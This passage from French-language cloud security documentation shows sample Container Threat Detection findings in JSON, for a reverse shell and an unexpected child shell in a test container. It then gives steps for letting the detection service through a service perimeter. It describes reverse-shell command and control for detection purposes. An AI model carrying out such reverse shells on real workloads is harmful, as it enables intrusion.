"DESTINATION_IP_ADDRESS", "Pod_Namespace": "default", "VM_Instance_Name": "INSTANCE_ID", "Reverse_Shell_Stdin_Redirection_Src_Port": SOURCE_PORT, "description": "A process started with stream redirection to a remote connected socket. With a reverse shell, an attacker can communicate from a compromised workload to an attacker-controlled machine. The attacker can then command and control the workload to perform desired actions, for example as part of a botnet.", "Parent_Pid": 1.0, "Process_Creation_Timestamp": { "seconds": 1.61798989E9, "nanos": 6.16573691E8 } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-04-09T17:38:10.904Z", "createTime": "2021-04-09T17:38:15.486Z", "propertyDataTypes": { "Container_Image_Id": { "primitiveDataType": "STRING" }, "Container_Creation_Timestamp": { "dataType": "TIMESTAMP", "structValue": { "fields": { "seconds": { "primitiveDataType": "NUMBER" }, "nanos": { "primitiveDataType": "NUMBER" } } } }, "Pod_Namespace": { "primitiveDataType": "STRING" }, "Environment_Variables": { "listValues": { "propertyDataTypes": [{ "primitiveDataType": "STRING" }] } }, "Reverse_Shell_Stdin_Redirection_Dst_Ip": { "primitiveDataType": "STRING" }, "description": { "primitiveDataType": "STRING" }, "Process_Arguments": { "listValues": { "propertyDataTypes": [{ "primitiveDataType": "STRING" }] } }, "Pid": { "primitiveDataType": "NUMBER" }, "Reverse_Shell_Stdin_Redirection_Src_Ip": { "primitiveDataType": "STRING" }, "Container_Image_Uri": { "primitiveDataType": "STRING" }, "Reverse_Shell_Stdin_Redirection_Dst_Port": { "primitiveDataType": "NUMBER" }, "Pod_Name": { "primitiveDataType": "STRING" }, "Process_Creation_Timestamp": { "dataType": "TIMESTAMP", "structValue": { "fields": { "seconds": { "primitiveDataType": "NUMBER" }, "nanos": { "primitiveDataType": "NUMBER" } } } }, "Reverse_Shell_Stdin_Redirection_Src_Port": { "primitiveDataType": "NUMBER" }, "Parent_Pid": { "primitiveDataType": "NUMBER" }, "VM_Instance_Name": { "primitiveDataType": "STRING" }, "Container_Name": { "primitiveDataType": "STRING" }, "Process_Binary_Fullpath": { "primitiveDataType": "STRING" } }, "severity": "CRITICAL", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "type": "google.container.Cluster" } }
Shell enfant inattendu
{ "finding": { "access": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Unexpected Child Shell", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": "CONTAINER_IMAGE_ID" } ], "createTime": "2023-06-29T17:34:13.765Z", "database": {}, "description": "A process should not normally create child shell processes, spawn a child shell process.", "eventTime": "2023-06-29T17:34:13.492Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "ns": "default", "name": "CONTAINER_NAME", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": CONTAINER_IMAGE_ID" } ] } ] }, "mitreAttack": { "primaryTactic": "EXECUTION", "primaryTechniques": [ "COMMAND_AND_SCRIPTING_INTERPRETER" ] }, "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/home/vmagent/app/temp/dash\"", "size": "31376", "sha256": "31351885b07570f450f57bd19cf28ff4310b8774a1c2580c3c7c9e7336c8467e", "hashedSize": "31376", "partiallyHashed": false }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false }, "args": [ "\"./temp/dash\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"HOSTNAME\"", "val": "\"ktd-test-unexpected-child-shell-3f50de2ab54bac1b\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://10.52.113.1:443\"" }, { "name": "\"PYTHONUNBUFFERED\"", "val": "\"1\"" }, { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"10.52.113.1\"" }, { "name": "\"PATH\"", "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"PWD\"", "val": "\"/home/vmagent/app\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"SHLVL\"", "val": "\"1\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"DEBIAN_FRONTEND\"", "val": "\"noninteractive\"" }, { "name": "\"PORT\"", "val": "\"8080\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"10.52.113.1\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://10.52.113.1:443\"" }, { "name": "\"_\"", "val": "\"./temp/dash\"" } ], "pid": "15", "parentPid": "14" }, { "binary": { "path": "\"/home/vmagent/app/temp/consul\"", "size": "0", "hashedSize": "0", "partiallyHashed": false }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false }, "args": [ "\"./temp/consul\"" ], "argumentsTruncated": false, "pid": "14", "parentPid": "13" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "severity": "CRITICAL", "state": "ACTIVE", "vulnerability": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "display_name": "CLUSTER_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.container.Cluster", "folders": [] }, "sourceProperties": { "Process_Arguments": [ "./temp/dash" ], "Pid": 15, "Process_Creation_Timestamp": { "seconds": 1688060050, "nanos": 207040864 }, "Container_Image_Uri": "CONTAINER_IMAGE_URI", "Process_Binary_Fullpath": "/home/vmagent/app/temp/dash", "VM_Instance_Name": "INSTANCE_ID", "Pod_Name": "POD_NAME", "Pod_Namespace": "default", "Container_Name": "CONTAINER_NAME", "Container_Image_Id": "CONTAINER_IMAGE_ID", "Container_Creation_Timestamp": { "seconds": 1688060050, "nanos": 0 }, "Parent_Pid": 14, "Environment_Variables": [ "HOSTNAME=ktd-test-unexpected-child-shell-3f50de2ab54bac1b", "KUBERNETES_PORT_443_TCP_PORT=443", "KUBERNETES_PORT=tcp://10.52.113.1:443", "PYTHONUNBUFFERED=1", "KUBERNETES_SERVICE_PORT=443", "KUBERNETES_SERVICE_HOST=10.52.113.1", "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "PWD=/home/vmagent/app", "LANG=C.UTF-8", "SHLVL=1", "HOME=/root", "KUBERNETES_PORT_443_TCP_PROTO=tcp", "KUBERNETES_SERVICE_PORT_HTTPS=443", "DEBIAN_FRONTEND=noninteractive", "PORT=8080", "KUBERNETES_PORT_443_TCP_ADDR=10.52.113.1", "KUBERNETES_PORT_443_TCP=tcp://10.52.113.1:443", "_=./temp/dash" ] } }
Analyser des projets protégés par un périmètre de service
Si vous avez activé Security Command Center au niveau de l'organisation après le 7 décembre 2023 et que vous disposez d'un périmètre de service qui bloque l'accès à certains projets et services, vous devez accorder au compte de service Container Threat Detection un accès entrant à ce périmètre de service. Sinon, Container Threat Detection ne peut pas produire de résultats liés aux projets et services protégés.
Pour les activations au niveau de l'organisation, l'identifiant du compte de service est une adresse e-mail au format suivant :
service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com
Dans l'exemple précédent, remplacez ORGANIZATION_ID par l'identifiant numérique de votre organisation.
Si votre cluster se trouve dans un périmètre de service VPC Service Controls, assurez-vous que l'API Container Threat Detection (containerthreatdetection.googleapis.com) figure dans la liste des services accessibles.
Pour en savoir plus, consultez Présentation des périmètres de service.
Pour accorder à un compte de service un accès entrant à un périmètre de service, procédez comme suit.
Accédez à VPC Service Controls.
Dans la barre d'outils, sélectionnez votre organisation Google Cloud .
Dans la liste déroulante, sélectionnez la règle d'accès contenant le périmètre de service auquel vous souhaitez accorder l'accès.
Les périmètres de service associés à la règle d'accès apparaissent dans la liste.
Cliquez sur le nom du périmètre de service.
Cliquez sur Modifier le périmètre.
Dans le menu de navigation, cliquez sur Règle d'entrée.
Cliquez sur Add rule (Ajouter une règle).
Configurez la règle comme suit :
Attributs "FROM" du client API
- Pour Source, sélectionnez Toutes les sources.
- Pour Identité, sélectionnez Identités sélectionnées.
- Dans le champ Ajouter un utilisateur/compte de service, cliquez sur Sélectionner.
- Saisissez l'adresse e-mail du compte de service. Si vous disposez de comptes de service au niveau de l'organisation et au niveau du projet, ajoutez-les tous les deux.
- Cliquez sur Enregistrer.
Attributs "TO" des services/ressources GCP
-
Pour Projet, sélectionnez Tous les projets.
Pour Services, sélectionnez Tous les services ou des services spécifiques pour lesquels des cas de non-respect de VPC Service Controls s'affichent.
Si un périmètre de service limite l'accès à un service requis, Container Threat Detection ne peut pas produire de résultats pour ce service.
Dans le menu de navigation, cliquez sur Enregistrer.
Pour plus d'informations, consultez la section Configurer les règles d'entrée et de sortie.
Étapes suivantes
En savoir plus sur le fonctionnement de Container Threat Detection.
Découvrez comment examiner et développer des plans d'intervention sur les menaces.